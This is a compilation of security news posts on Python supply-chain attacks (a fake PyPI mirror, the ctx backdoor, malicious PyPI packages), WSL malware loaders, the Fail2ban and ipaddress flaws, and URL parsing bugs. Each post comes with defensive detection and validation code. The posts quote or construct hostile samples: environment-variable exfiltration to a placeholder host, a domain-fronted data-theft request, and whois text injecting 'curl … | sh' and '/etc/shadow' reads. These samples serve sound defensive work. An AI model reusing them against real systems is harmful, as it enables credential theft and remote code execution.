The post Major Python Infrastructure Breach – Over 170K Users Compromised. How Safe Is Your Code? appeared first on Information Security Newspaper | Hacking News.
One victim described noticing suspicious activity tied to the “colorama” package, which eventually led to the realization that they had been compromised. The account illustrates the stealth and deceit of the campaign: the attackers combined a fake Python package mirror, typosquatting and malicious GitHub repositories to deliver their malware.
The fake mirror, served from the domain “files[.]pypihosted[.]org”, was a typosquat of files.pythonhosted.org, the domain from which PyPI itself serves package files, and it was central to the attack’s success. By hosting a tampered version of “colorama” laden with malicious code there, and by using stolen GitHub identities to commit changes to reputable repositories, the attackers showed a sophisticated understanding of the software supply chain’s weak points.
The attack on the software supply chain leveraging fake Python infrastructure utilized a complex array of techniques to compromise over 170,000 users. Here’s a breakdown of the key attack techniques used:
Each of these techniques demonstrates the attackers’ deep understanding of both social engineering and technical vulnerabilities within the software supply chain. The combination of these methods allowed for a highly effective and damaging attack.
The attackers hosted a poisoned version of “colorama”, a widely used package in the Python community with over 150 million monthly downloads. Here’s how they executed this part of their sophisticated attack:
The attackers edited the projects’ requirements.txt files so that they referenced the malicious package version hosted on the fake mirror. This ensured that whenever such a project was installed or updated, the poisoned “colorama” would be downloaded and executed. By hosting the poisoned package on their own infrastructure and linking it from popular projects, the attackers carried out a silent supply chain attack that compromised the systems of unsuspecting developers and users. The episode underscores the importance of verifying where dependencies come from, and the need for vigilance against increasingly sophisticated threats.
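A check a maintainer could run against the kind of requirements.txt tampering described above, added here as an example and not taken from the article or from any of the projects involved. It assumes only that the official hosts are pypi.org and files.pythonhosted.org; the sample file and its placeholder hash are constructed, and the brand-token rule for spotting lookalike hosts is a heuristic.

```python
"""Audit a requirements.txt for dependency sources that bypass PyPI.

Flags index/find-links options that point anywhere other than PyPI, direct-URL
requirements hosted outside PyPI, hostnames that borrow PyPI/Python branding
(such as files[.]pypihosted[.]org) and pinned packages with no --hash= entry.
"""
from __future__ import annotations
import re
from urllib.parse import urlparse

OFFICIAL_HOSTS = {"pypi.org", "files.pythonhosted.org"}
BRAND_TOKENS = ("pypi", "python")  # assumption: any other host using these is a lookalike

OPTION_RE = re.compile(r"^(?:-i|--index-url|--extra-index-url|-f|--find-links)(?:=|\s+)(\S+)")
DIRECT_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)\s*@\s*(\S+)")
PIN_RE = re.compile(r"^([A-Za-z0-9][A-Za-z0-9._-]*)==\S+")


def classify_host(host: str) -> str:
    """'official', 'lookalike' (borrows PyPI/Python branding) or 'third-party'."""
    host = host.lower()
    if host in OFFICIAL_HOSTS:
        return "official"
    if any(token in host for token in BRAND_TOKENS):
        return "lookalike"
    return "third-party"


def audit_requirements(text: str) -> list[tuple[int, str, str]]:
    """Return (line number, finding kind, detail) for every risky line."""
    findings = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.split("#", 1)[0].strip()  # drop comments and blank lines
        if not line:
            continue
        if m := OPTION_RE.match(line):
            host = urlparse(m.group(1)).hostname or ""
            verdict = classify_host(host)
            if verdict != "official":
                findings.append((lineno, f"{verdict}-index", host))
        elif m := DIRECT_RE.match(line):
            host = urlparse(m.group(2)).hostname or ""
            verdict = classify_host(host)
            if verdict != "official":
                findings.append((lineno, f"{verdict}-direct-url", f"{m.group(1)} from {host}"))
        elif m := PIN_RE.match(line):
            if "--hash=" not in line:  # a pin without a hash still trusts whatever the index serves
                findings.append((lineno, "unhashed-pin", m.group(1)))
        else:  # ranges, -r includes and anything else: report for manual review
            findings.append((lineno, "unpinned", line.split()[0]))
    return findings


# Constructed sample file; the sha256 value is a placeholder, not a real digest.
SAMPLE_REQUIREMENTS = f"""\
# constructed requirements.txt
colorama==0.4.6 --hash=sha256:{'0' * 64}
requests==2.31.0
colorama @ https://files.pypihosted.org/packages/colorama-0.4.6.tar.gz
--extra-index-url https://mirror.example.org/simple
"""

if __name__ == "__main__":
    for lineno, kind, detail in audit_requirements(SAMPLE_REQUIREMENTS):
        print(f"line {lineno}: {kind}: {detail}")
```

Run it with `pip install --require-hashes` in mind: once every pin carries a hash, a swapped artifact on any mirror fails to install instead of executing.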
The deployment of the malicious package in the attack using the fake Python infrastructure involved a sophisticated multi-stage process. Here’s a breakdown of the stages through which the malicious package, particularly the poisoned “colorama”, was deployed and executed on the victims’ systems:
These stages illustrate the meticulous planning and execution of the attack, showcasing the attackers’ technical sophistication and understanding of both software dependencies and human behavior. The multi-stage approach not only facilitated the deployment of the malicious payload but also helped in evading detection, making the attack particularly damaging.
The attack involving the fake Python infrastructure and the poisoned “colorama” package also saw the publication of several other malicious packages to the Python Package Index (PyPI). These packages were part of the attackers’ strategy to distribute malware through the Python package ecosystem. Below is a list of some of the packages involved in this campaign, along with their version numbers and the usernames of the publishers:
These packages, including variations of the “colorama” package and others with obscure or clickbait names, were part of a broader strategy to distribute malware. The attackers employed these packages as vectors for delivering malicious code to unsuspecting victims’ systems, exploiting the trust placed in the PyPI ecosystem and the routine use of these packages in Python projects.
This list provides a snapshot of the malicious packages published by the attackers, illustrating the scale and diversity of their efforts to infiltrate the software supply chain. Users and developers are urged to exercise caution and perform thorough vetting before incorporating third-party packages into their projects.
This campaign exemplifies the advanced strategies malicious actors adopt to infiltrate and compromise trusted platforms like PyPI and GitHub. It serves as a stark reminder of the necessity for diligence when installing packages and repositories, even from seemingly reliable sources. Vigilance, thorough vetting of dependencies, and the maintenance of robust security measures are paramount in mitigating the risks posed by such sophisticated attacks.
The post Popular Python package ctx Python and PHP library were compromised and injected with a backdoor appeared first on Information Security Newspaper | Hacking News.
As reported a few hours ago, the package received a new release, v0.2.6, which drew attention because ctx had not been updated in eight years.
After the update was reflected in the GitHub repository, researchers analysed the code and found the following additions:
The injected code runs when a Ctx dictionary object is created: it collects all of the process’s environment variables and sends them to a URL on a Heroku application under the attackers’ control.
Experts consider this a clear sign that the current version of the package has been manipulated for malicious purposes and should not be used.
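To show what a reviewer could have looked for in the ctx release, here is an added example (not code from the article or from the ctx project) that walks a module’s syntax tree for functions which both read the environment and call out to the network, and for constructors that call such a function. The module it scans is constructed to resemble the reported behaviour, not the real payload; the collector URL is a placeholder and the list of network-call prefixes is an assumption.

```python
"""Static check for the ctx-style backdoor: environment variables handed to a
network call, reachable from a constructor that runs as soon as the package is used."""
from __future__ import annotations
import ast

# Call prefixes treated as "talks to the network" (assumption; extend as needed).
NETWORK_PREFIXES = ("requests.", "urllib.request.", "urllib2.", "http.client.", "httpx.", "socket.")

# Constructed module resembling the reported pattern; not the real ctx code.
SAMPLE_SOURCE = '''\
import os
import base64
import requests

class Ctx(dict):
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
        self.send_environment()

    def send_environment(self):
        payload = base64.b64encode(str(dict(os.environ)).encode())
        requests.get("https://collector.example.invalid/", params={"data": payload})
'''


def dotted_name(node: ast.AST) -> str | None:
    """'os.environ' for an Attribute chain rooted at a Name, else None."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def _analyse(fn: ast.FunctionDef | ast.AsyncFunctionDef) -> dict:
    info = {"line": fn.lineno, "env": False, "net": False, "calls": set()}
    for sub in ast.walk(fn):
        if dotted_name(sub) in ("os.environ", "os.getenv"):
            info["env"] = True
        if isinstance(sub, ast.Call):
            callee = dotted_name(sub.func) or ""
            if callee.startswith(NETWORK_PREFIXES):
                info["net"] = True
            # remember self.helper() / helper() so constructor-to-helper chains are visible
            if callee.startswith("self."):
                info["calls"].add(callee[len("self."):])
            elif callee and "." not in callee:
                info["calls"].add(callee)
    return info


def find_env_exfil(source: str) -> list[tuple[int, str, str]]:
    """Return (line, qualified function name, reason) for suspicious functions."""
    tree = ast.parse(source)
    funcs: dict[str, dict] = {}
    for node in tree.body:  # top-level functions and methods only; nested defs are ignored
        if isinstance(node, (ast.FunctionDef, ast.AsyncFunctionDef)):
            funcs[node.name] = _analyse(node)
        elif isinstance(node, ast.ClassDef):
            for item in node.body:
                if isinstance(item, (ast.FunctionDef, ast.AsyncFunctionDef)):
                    funcs[f"{node.name}.{item.name}"] = _analyse(item)
    direct = {name for name, info in funcs.items() if info["env"] and info["net"]}
    findings = [(funcs[n]["line"], n, "reads os.environ and makes a network call") for n in direct]
    for name, info in funcs.items():
        scope = name.rsplit(".", 1)[0] if "." in name else ""
        for callee in info["calls"]:
            target = f"{scope}.{callee}" if scope else callee
            if target in direct:
                findings.append((info["line"], name, f"calls {target}"))
    return sorted(findings)


if __name__ == "__main__":
    for line, name, reason in find_env_exfil(SAMPLE_SOURCE):
        print(f"line {line}: {name}: {reason}")
```

The check is deliberately shallow (no data-flow through variables or across modules), which is enough to surface the shape seen here: a constructor that fires a helper sending os.environ somewhere. Run it over the unpacked sdist of a dependency whose release date or version jump looks odd before installing it.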
Other versions of a ‘phpass’ fork published in the Packagist repository were also manipulated to add this malicious code; PHPass has reportedly been downloaded about 2.5 million times.
According to security researcher Somdev Sangwan, the insertion of this backdoor could be aimed at extracting access credentials for Amazon Web Services (AWS).
The malicious version was released on May 14, so users who installed the package before that date are employing the original version (v0.1.2) and will not be affected by this issue. On the other hand, any installation of ctx Python after May 14 could include malicious code.
As for the attack method, specialists note that the domain used by the original maintainer of ctx had expired. Re-registering it gave the attackers control of the maintainer’s e-mail address, which could then be used to recover the PyPI account and take over the package, after which they added the malicious payload and published it.
The official page of the ctx Python project in PyPI has been removed, showing the error ‘Not Found’ to visitors.
Feel free to access the International Institute of Cyber Security (IICS) websites to learn more about information security risks, malware variants, vulnerabilities, and information technologies.
The post Eight vulnerabilities in 16 URL parsing libraries written in C, JavaScript, PHP, Python and Ruby; hackers could deploy DoS and RCE attacks against thousands of web applications appeared first on Information Security Newspaper | Hacking News.
According to the report, the flaws lie in the following projects:
As you may recall, URL parsing is the process of splitting a web address into its components so that a request can be routed correctly to different links or servers. URL parsing libraries are imported into applications to perform this function and are available in many programming languages.
The components of a URL are known as the scheme, authority, path, query and fragment, each with its own role in how the address is interpreted.
In their research, the experts found that the flaws stem from differences in the way each library parses a URL. According to the report, the flaws reside in the following URL parsing libraries:
The analysis revealed eight critical vulnerabilities affecting third-party web applications that use these libraries. At the time of writing, all of the flaws had been addressed except those in versions of Flask that no longer receive support. The flaws detected are described below:
Although these are all of the flaws reported in this research, the experts note that other classes of bug should not be ruled out, including server-side request forgery (SSRF) and open redirection, which would enable sophisticated phishing campaigns and other attacks.
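The SSRF and open-redirect risk just mentioned comes from two parsers disagreeing about which host a URL names: the code that checks an allowlist uses one, the code that makes the request uses another. The following added example (not code from the research or from any of the libraries it covers) extracts the host three ways: with Python’s standard urlsplit, with a simplified version of the browser rule that a backslash ends the authority of an http(s) URL, and with the kind of hand-written regex an application might use for an allowlist. The probe URLs are constructed and name no real hosts.

```python
"""Host extraction three ways, to surface parser disagreement on crafted URLs."""
from __future__ import annotations
import re
from urllib.parse import urlsplit

# Hand-rolled allowlist check: skip optional userinfo, then take the host.
# The userinfo skip greedily eats everything up to the LAST '@', which is the mistake.
NAIVE_HOST_RE = re.compile(r"^[a-zA-Z][a-zA-Z0-9+.-]*://(?:[^@]*@)?([^/:?#]+)")


def whatwg_like_host(url: str) -> str | None:
    """Browser-style host: for special schemes '\\' counts as '/', so the
    authority ends at the first '/', '\\', '?' or '#'. Simplified, not a full WHATWG parser."""
    m = re.match(r"^([a-zA-Z][a-zA-Z0-9+.-]*):[/\\]{2}(.*)$", url)
    if not m:
        return None
    authority = re.split(r"[/\\?#]", m.group(2), maxsplit=1)[0]
    hostport = authority.rpartition("@")[2]
    if hostport.startswith("["):  # IPv6 literal
        return hostport.split("]")[0][1:].lower() or None
    return hostport.split(":")[0].lower() or None


def regex_host(url: str) -> str | None:
    m = NAIVE_HOST_RE.match(url)
    return m.group(1).lower() if m else None


def parse_host_three_ways(url: str) -> dict[str, str | None]:
    return {
        "urlsplit": urlsplit(url).hostname,   # what urllib-based fetch code will connect to
        "whatwg_like": whatwg_like_host(url),  # what a browser or WHATWG-style library sees
        "regex": regex_host(url),              # what a naive validator believes it checked
    }


def parsers_agree(url: str) -> bool:
    """True only when every parser names the same host; anything else is a red flag."""
    return len(set(parse_host_three_ways(url).values())) == 1


# Constructed probes
PROBES = [
    "https://good.example.com/path?q=1",             # everyone agrees
    "https://good.example.com\\@evil.example.com/",  # backslash confusion
    "https://evil.example.com#@good.example.com/",   # '@' placed after the fragment delimiter
]

if __name__ == "__main__":
    for url in PROBES:
        print(url, parse_host_three_ways(url), "agree" if parsers_agree(url) else "DISAGREE")
```

The practical rule that follows: validate and fetch with the same parser, and reject any URL on which the parsers you can afford to run disagree, rather than trusting whichever one the allowlist code happened to use.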
Users of affected deployments should carefully assess the risks of the URL parsing libraries they rely on and configure the security measures needed to prevent exploitation of these errors.
The post Researchers find 11 malicious Python packages in the PyPI repository that can steal access tokens, passwords and create backdoors appeared first on Information Security Newspaper | Hacking News.
The list of malicious packages detected in this research is shown below:
Among these packages, the experts note that “importantpackage”, “10Cent10” and “10Cent11” appear to establish a reverse shell on the compromised machine. In addition, “importantpackage” abuses TLS termination at a CDN, using Fastly to hide its communications with the command-and-control (C&C) server.
According to the report, the communication code for this malware is:
# b64_payload holds the Base64-encoded stolen data; request is urllib.request
url = "https://pypi.python.org" + "/images" + "?" + "guid=" + b64_payload
r = request.Request(url, headers={'Host': "psec.forward.io.global.prod.fastly.net"})
The researchers explain that this code sends an HTTPS request to pypi.python.org, whose TLS connection terminates at Fastly’s CDN. Fastly then routes the request by its Host header, forwarding it to the attackers’ Fastly-fronted backend named in that header, psec.forward.io.global.prod.fastly.net, rather than to PyPI. On the wire the traffic looks like ordinary package-index activity, which is the domain-fronting trick.
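The detection opportunity in that trick is the mismatch between the TLS server name (SNI) and the HTTP Host header. The following is an added example, not from the JFrog research: it reads constructed proxy log lines (the JSON layout with sni, host and path fields is an assumption about what a TLS-inspecting proxy would emit), flags requests whose SNI is one of the expected package-index hosts while the Host header points elsewhere, and decodes the base64 guid parameter the sample used as its exfiltration channel.

```python
"""Flag domain-fronted requests in proxy logs and decode the sample's exfil parameter."""
from __future__ import annotations
import base64
import binascii
import json
from urllib.parse import parse_qs, urlsplit

EXPECTED_SNI = {"pypi.org", "files.pythonhosted.org", "pypi.python.org"}  # assumed allowlist

# Constructed log lines; only the third one is fronted.
SAMPLE_LOG = """\
{"ts": "2021-11-18T10:00:01Z", "src": "10.0.0.5", "sni": "pypi.org", "host": "pypi.org", "path": "/simple/requests/"}
{"ts": "2021-11-18T10:00:02Z", "src": "10.0.0.5", "sni": "files.pythonhosted.org", "host": "files.pythonhosted.org:443", "path": "/packages/requests-2.26.0.tar.gz"}
{"ts": "2021-11-18T10:00:03Z", "src": "10.0.0.7", "sni": "pypi.python.org", "host": "psec.forward.io.global.prod.fastly.net", "path": "/images?guid=aGVsbG8="}
"""


def normalise_host(value: str) -> str:
    """Lower-case and drop a trailing :port so 'a.example:443' compares equal to 'a.example'."""
    value = value.strip().lower()
    if value.startswith("["):  # [v6]:port
        return value.split("]")[0] + "]"
    return value.rsplit(":", 1)[0] if ":" in value else value


def decode_guid(path: str) -> str | None:
    """The sample carried its data base64-encoded in ?guid=; decode it for the analyst."""
    values = parse_qs(urlsplit(path).query).get("guid")
    if not values:
        return None
    raw = values[0]
    try:
        return base64.b64decode(raw + "=" * (-len(raw) % 4)).decode("utf-8", "replace")
    except (binascii.Error, ValueError):
        return None


def find_fronting(log_text: str) -> list[dict]:
    """SNI inside the allowlist but Host elsewhere: the TLS layer says 'PyPI',
    the HTTP layer asks the CDN for another tenant's backend."""
    alerts = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = json.loads(raw)
        sni = normalise_host(rec.get("sni", ""))
        host = normalise_host(rec.get("host", ""))
        if not sni or not host or sni == host:
            continue
        if sni in EXPECTED_SNI:
            alerts.append({
                "ts": rec.get("ts"), "src": rec.get("src"), "sni": sni, "host": host,
                "path": rec.get("path"), "payload": decode_guid(rec.get("path", "")),
            })
    return alerts


if __name__ == "__main__":
    for alert in find_fronting(SAMPLE_LOG):
        print(alert)
```

This only works where the proxy sees both layers, which means TLS inspection for outbound traffic; without it, the only observable is the SNI, which is exactly what the technique makes look innocent.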
Dependency confusion involves publishing malicious packages that carry the same name as legitimate internal, private packages, but with a higher version number, to public repositories. Package managers that consult both private and public indexes and choose the highest version available are tricked into downloading and installing the malicious module.
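Why the highest-version rule is enough to hijack an install, shown with an added example that models the candidate selection rather than reproducing pip’s code. The package name, the two indexes and the version numbers are constructed; the three resolve_* functions stand for the three ways a pip configuration can be set up.

```python
"""A minimal model of index merging: highest version wins, whatever index it came from."""
from __future__ import annotations

PRIVATE_INDEX = "https://pypi.internal.example/simple"  # assumed private index
PUBLIC_INDEX = "https://pypi.org/simple"

# Constructed: a package that exists only internally, until an attacker registers
# the same name on PyPI with an absurdly large version number.
CANDIDATES = {
    "acme-internal-utils": {
        PRIVATE_INDEX: ["1.2.0", "1.3.1"],
        PUBLIC_INDEX: ["99.0.0"],
    }
}


def version_key(version: str) -> tuple[int, ...]:
    """Numeric ordering, enough for this demonstration (real resolvers implement PEP 440)."""
    return tuple(int(part) for part in version.split("."))


def resolve(name: str, indexes: list[str], pin: str | None = None) -> tuple[str, str] | None:
    """Pick the highest version offered by ANY of the indexes, as pip does once
    --extra-index-url merges candidates; an exact pin narrows the choice."""
    best = None
    for index in indexes:
        for version in CANDIDATES.get(name, {}).get(index, []):
            if pin is not None and version != pin:
                continue
            if best is None or version_key(version) > version_key(best[0]):
                best = (version, index)
    return best


def resolve_with_extra_index(name: str):
    """--index-url PRIVATE --extra-index-url PUBLIC: the confusable configuration."""
    return resolve(name, [PRIVATE_INDEX, PUBLIC_INDEX])


def resolve_private_only(name: str):
    """--index-url PRIVATE only, with the private index proxying PyPI for public names."""
    return resolve(name, [PRIVATE_INDEX])


def resolve_pinned(name: str, pin: str):
    """Both indexes, but name==pin; pair this with --hash to bind the exact artifact."""
    return resolve(name, [PRIVATE_INDEX, PUBLIC_INDEX], pin=pin)


if __name__ == "__main__":
    print("extra-index:", resolve_with_extra_index("acme-internal-utils"))
    print("private only:", resolve_private_only("acme-internal-utils"))
    print("pinned 1.3.1:", resolve_pinned("acme-internal-utils", "1.3.1"))
```

Pinning alone is not a complete fix: an attacker who also publishes the pinned version number to the public index is back to a coin toss. A single index that owns the private namespace, plus hash-pinned requirements, removes the ambiguity.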
The researchers conclude that, while similar techniques have been seen before, this campaign gives threat actors a stealthy foothold and could serve as the prelude to subsequent attacks.
The post New malware can infect Windows and Linux devices; 70 different VirusTotal antivirus engines can’t detect it appeared first on Information Security Newspaper | Hacking News.
While the cybersecurity community had only theorized about such problems, it was not until Black Lotus Labs published its latest research that the existence of serious security risks involving WSL was confirmed. In the report, the experts describe finding a number of unusual ELF files compiled for Debian Linux, written in Python 3 and packaged into ELF executables with PyInstaller.
According to the report, the Python code acts as a loader: it uses multiple Windows APIs to retrieve a remote file and then inject it into a running process, a technique that lets threat actors tamper with the affected system while evading detection. The VirusTotal results confirm how hard the samples are to detect, since endpoint agents for Windows generally lack signatures for ELF files.
The researchers identified two variants of the malicious ELF loader: the first was written purely in Python, while the second uses Python mainly to call Windows APIs through ctypes and to invoke a PowerShell script. The experts believe the PowerShell variant is still under development, but it is a viable approach, as it amounts to a proof of concept (PoC) for calling the Windows API from the WSL subsystem.
This appears to be the first iteration of the ELF loader. A notable feature is that it uses only standard Python libraries, so it can run on both Linux and Windows machines. In a test run, the script displayed the Russian characters “Пивет Саня”. All associated files contained private or non-routable IP addresses, except for one.
That sample contained a public IP address (185.63.90.137) and a loader written in Python and converted into an executable with PyInstaller. The file attempts to all­ocate memory on the machine, create a new process and inject into it a resource fetched from a remote server at hxxp://185.63.90.137:1338/stagers/l5l.py. The file was already offline, suggesting that the threat actors left this address behind from an earlier test or attack.
According to the experts, some samples used PowerShell to inject and execute shellcode, while others used Python ctypes to resolve Windows APIs. In one PowerShell sample, the compiled Python called three functions: kill_av(), reverseshell() and windowspersistence().
The kill_av() function terminates antivirus products and other scanning tools using os.popen(). The reverseshell() function starts a thread that runs a Base64-encoded PowerShell script every 20 seconds inside an infinite while loop, which blocks the execution of any other function. Finally, windowspersistence() copies the original ELF file to the AppData folder as payload.exe and uses a thread to add a registry run key for persistence.
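Because Windows endpoint agents tend to ignore ELF files, a responder has to look at file contents rather than extensions. The following added example (not from the Black Lotus Labs report) classifies files by their bytes: it recognises the ELF header, reads the class and machine fields, and looks for the PyInstaller archive cookie, which begins with the documented MEI magic, to single out PyInstaller bundles like the loaders described above. The sample ELF images are constructed in the block itself.

```python
"""Triage ELF files and spot PyInstaller bundles by content, not extension."""
from __future__ import annotations
import os
import struct
import sys

ELF_MAGIC = b"\x7fELF"
PYINSTALLER_MAGIC = b"MEI\x0c\x0b\x0a\x0b\x0e"  # start of PyInstaller's CArchive cookie


def classify_bytes(data: bytes) -> dict:
    """Return {'elf', 'class', 'machine', 'pyinstaller'} for a file's contents."""
    info = {"elf": False, "class": None, "machine": None, "pyinstaller": False}
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        return info
    info["elf"] = True
    info["class"] = {1: "32", 2: "64"}.get(data[4])        # EI_CLASS
    endian = "<" if data[5] == 1 else ">"                   # EI_DATA
    info["machine"] = struct.unpack(endian + "H", data[18:20])[0]  # e_machine
    info["pyinstaller"] = PYINSTALLER_MAGIC in data         # cookie sits in the appended archive
    return info


def scan_tree(root: str) -> list[tuple[str, dict]]:
    """Walk a directory (e.g. an exported WSL rootfs) and list every ELF with its verdict."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                with open(path, "rb") as fh:
                    data = fh.read()
            except OSError:
                continue
            info = classify_bytes(data)
            if info["elf"]:
                hits.append((path, info))
    return hits


def build_sample_elf(pyinstaller: bool, machine: int = 0x3E) -> bytes:
    """Constructed stand-in for a Debian x86-64 ELF, optionally carrying the PyInstaller cookie."""
    header = bytearray(64)
    header[:4] = ELF_MAGIC
    header[4], header[5] = 2, 1                  # ELFCLASS64, little-endian
    header[16:18] = struct.pack("<H", 2)         # e_type = ET_EXEC
    header[18:20] = struct.pack("<H", machine)   # e_machine = 0x3E (x86-64)
    body = bytes(header) + b"\x00" * 256
    if pyinstaller:
        body += PYINSTALLER_MAGIC + b"\x00" * 24  # appended the way PyInstaller does
    return body


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for path, info in scan_tree(root):
        flag = "PYINSTALLER" if info["pyinstaller"] else ""
        print(f"{path}: ELF{info['class']} machine=0x{info['machine']:x} {flag}")
```

Point it at a distribution’s file system: for WSL 1 that is typically %LOCALAPPDATA%\Packages\<distro>\LocalState\rootfs, while WSL 2 keeps the rootfs inside an ext4 virtual disk, which is easier to reach through \\wsl$\<distro> or from inside the distribution. A PyInstaller ELF on a developer workstation is not malicious by itself, but it is rare enough to be worth a closer look.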
As this shows, threat actors are always looking for new attack surfaces, so the Black Lotus researchers recommend that users with WSL enabled make sure WSL activity is properly logged so that these kinds of threats can be detected.
The post Critical remote code execution vulnerability in Fail2ban. Protect your servers appeared first on Information Security Newspaper | Hacking News.
Tracked as CVE-2021-32749, the flaw lies in the mail-whois action and is due to incorrect input validation: the output of the whois lookup for the banned IP address is passed to the mail command without escaping, and mail interprets tilde escape sequences in its input. A remote attacker who controls the whois data for an address that triggers a ban can therefore embed commands that run on the Fail2ban host.
The vulnerability received a score of 8.5/10 on the Common Vulnerability Scoring System (CVSS) scale, and its exploitation would allow threat actors to completely compromise the affected system.
This flaw was detected in the following versions of Fail2ban: 0.9.0, 0.9.1, 0.9.2, 0.9.3, 0.9.4, 0.9.5, 0.9.6, 0.9.7, 0.10.0, 0.10.1, 0.10.2, 0.10.3, 0.10.3.1, 0.10.4, 0.10.5, 0.10.6, 0.11.1, and 0.11.2.
Although the vulnerability can be exploited remotely by supplying specially crafted whois data, researchers have not detected any active exploitation attempts or any malware variant associated with the attack.
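What the unescaped path looks like, and the minimal defence, as an added example that is not fail2ban’s code: mailx treats a tilde at the start of an input line as an escape (‘~! cmd’ runs a shell command, ‘~r file’ reads a file into the message) and prints a literal tilde for ‘~~’, so untrusted text must have every line-leading tilde doubled before it is piped into mail. The whois response below is constructed and uses documentation address ranges.

```python
"""Neutralise mailx tilde escapes in untrusted text before it reaches mail(1)."""
import re

TILDE_ESCAPE_RE = re.compile(r"^~", re.MULTILINE)


def contains_tilde_escape(text: str) -> bool:
    """True if any line of the text would be read by mailx as an escape."""
    return TILDE_ESCAPE_RE.search(text) is not None


def neutralise_tilde_escapes(text: str) -> str:
    """Double any tilde that starts a line so mailx prints it instead of acting on it."""
    return TILDE_ESCAPE_RE.sub("~~", text)


def build_notification(ip: str, whois_text: str) -> str:
    """Body of a ban notification; everything that came from whois goes through the filter."""
    body = (f"The IP {ip} has just been banned after repeated failures.\n\n"
            f"Lines containing IP:{ip} in whois:\n")
    return body + neutralise_tilde_escapes(whois_text)


# Constructed whois response whose remarks carry an injection attempt.
SAMPLE_WHOIS = """\
inetnum:        192.0.2.0 - 192.0.2.255
netname:        EXAMPLE-NET
remarks:        abuse contact below
~! curl http://203.0.113.9/p.sh | sh
~r /etc/shadow
mnt-by:         EXAMPLE-MNT
"""

if __name__ == "__main__":
    print(build_notification("192.0.2.10", SAMPLE_WHOIS))
```

The upstream fix took the other route and stops mailx from interpreting escapes in the invocation itself; the filter above is the defence to apply when you cannot change how mail is called, and it generalises to any untrusted text (log excerpts, reverse-DNS names) that an action feeds to mail.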
Fail2ban developers recommend that users of vulnerable deployments update as soon as possible; patches that address this flaw are now available.
The post IP address validation flaw also affects Python projects appeared first on Information Security Newspaper | Hacking News.
A couple of months ago, a critical IP validation vulnerability was reported in the netmask library used by thousands of applications. Tracked as CVE-2021-28918, the flaw exists in the npm and Perl versions of netmask and in other similar libraries.
The most recent report indicates that the ipaddress standard library module introduced in Python 3.3 is affected by the same kind of flaw. According to the researchers responsible for the finding, the vulnerability is due to incorrect parsing of IP addresses by the module. As many will know, the ipaddress module gives Python developers functions for creating and manipulating IP addresses, networks and interfaces.
An IPv4 address can be written in several formats (as a plain integer, or in dotted decimal, hexadecimal or octal notation), although it is usually written in dotted decimal. Suppose you are given the address 127.0.0.1, widely understood as the local loopback address.
If it carried a leading zero, should an application parse it as 0127.0.0.1 or as 127.0.0.1? As BleepingComputer showed, typing 0127.0.0.1 into the Chrome address bar makes the browser treat the first octet as octal: pressing Enter rewrites the address to its decimal equivalent, 87.0.0.1, which is how most applications are expected to handle this form.
Under the original specification, octets of an IPv4 address prefixed with “0” may be interpreted as octal; Python’s standard library, however, simply strips the leading zeros. A proof of concept shows that the ipaddress module discards them outright: parsed with ipaddress, ‘010.8.8.8’ is treated as ‘10.8.8.8’ instead of ‘8.8.8.8’.
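A strict dotted-decimal validator that refuses the ambiguous forms, added as an example and not taken from the article or from CPython. On a patched interpreter ipaddress itself raises on leading zeros; the point of an explicit check is that the decision no longer depends on which interpreter, or which other library (as with netmask), ends up parsing the string. The companion function applies the octal reading that inet_aton and Chrome use, so the two interpretations can be compared side by side.

```python
"""Reject IPv4 strings whose meaning depends on the parser."""
from __future__ import annotations
import re

DOTTED_QUAD_RE = re.compile(r"^(\d{1,3})\.(\d{1,3})\.(\d{1,3})\.(\d{1,3})$")


def parse_strict_ipv4(text: str) -> tuple[int, int, int, int]:
    """Accept only canonical dotted-decimal: four octets, 0-255, no leading zeros."""
    m = DOTTED_QUAD_RE.match(text)
    if not m:
        raise ValueError(f"not dotted-decimal: {text!r}")
    octets = []
    for part in m.groups():
        if len(part) > 1 and part[0] == "0":
            # '010' is octal to inet_aton and a browser, decimal to the buggy stdlib:
            # ambiguous, so reject rather than guess.
            raise ValueError(f"leading zero in octet {part!r} of {text!r}")
        value = int(part)
        if value > 255:
            raise ValueError(f"octet {part!r} out of range in {text!r}")
        octets.append(value)
    return octets[0], octets[1], octets[2], octets[3]


def is_strict_ipv4(text: str) -> bool:
    try:
        parse_strict_ipv4(text)
        return True
    except ValueError:
        return False


def inet_aton_style(text: str) -> str:
    """How BSD inet_aton (and Chrome) read the same four-part string: a leading 0
    means octal and 0x means hex. Only the four-part form is handled here."""
    parts = text.split(".")
    if len(parts) != 4:
        raise ValueError("only the four-part form is handled here")
    values = []
    for p in parts:
        if p[:2].lower() == "0x":
            values.append(int(p[2:], 16))
        elif len(p) > 1 and p[0] == "0":
            values.append(int(p, 8))
        else:
            values.append(int(p))
    if any(v > 255 for v in values):
        raise ValueError("octet out of range")
    return ".".join(str(v) for v in values)


def is_loopback_or_private(text: str) -> bool:
    """An allowlist decision that must not depend on which interpreter parses the address."""
    a, b, _, _ = parse_strict_ipv4(text)
    return a == 127 or a == 10 or (a == 172 and 16 <= b <= 31) or (a == 192 and b == 168)


if __name__ == "__main__":
    for s in ("127.0.0.1", "0127.0.0.1", "010.8.8.8"):
        print(s, "strict:", is_strict_ipv4(s), "inet_aton:", inet_aton_style(s))
```

The failure mode this closes is an SSRF or access-control check that accepts ‘010.8.8.8’ because one parser reads it as 10.0.0.0/8 (private) while the component that actually connects reads it as 8.8.8.8.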
“Incorrect input validation of octal strings in Python 3.8.0 to v3.10 stdlib ipaddress allows threat actors to perform Man-in-The-Middle (MiTM) attacks, request forgery, among other attack variants,” the investigation notes.
Although the ipaddress module was introduced in Python 3.3, this regression affects the module from Python 3.8.0 through 3.10. Several temporary mitigation options have been published on the project’s official channels.
The post Running Python Code, Without Python Installed on the System appeared first on Information Security Newspaper | Hacking News.
Have you ever imagined running Python code on Windows without installing Python? During a penetration test you regularly land on a device under test that does not have Python installed; in that situation, the approach below provides a solution.
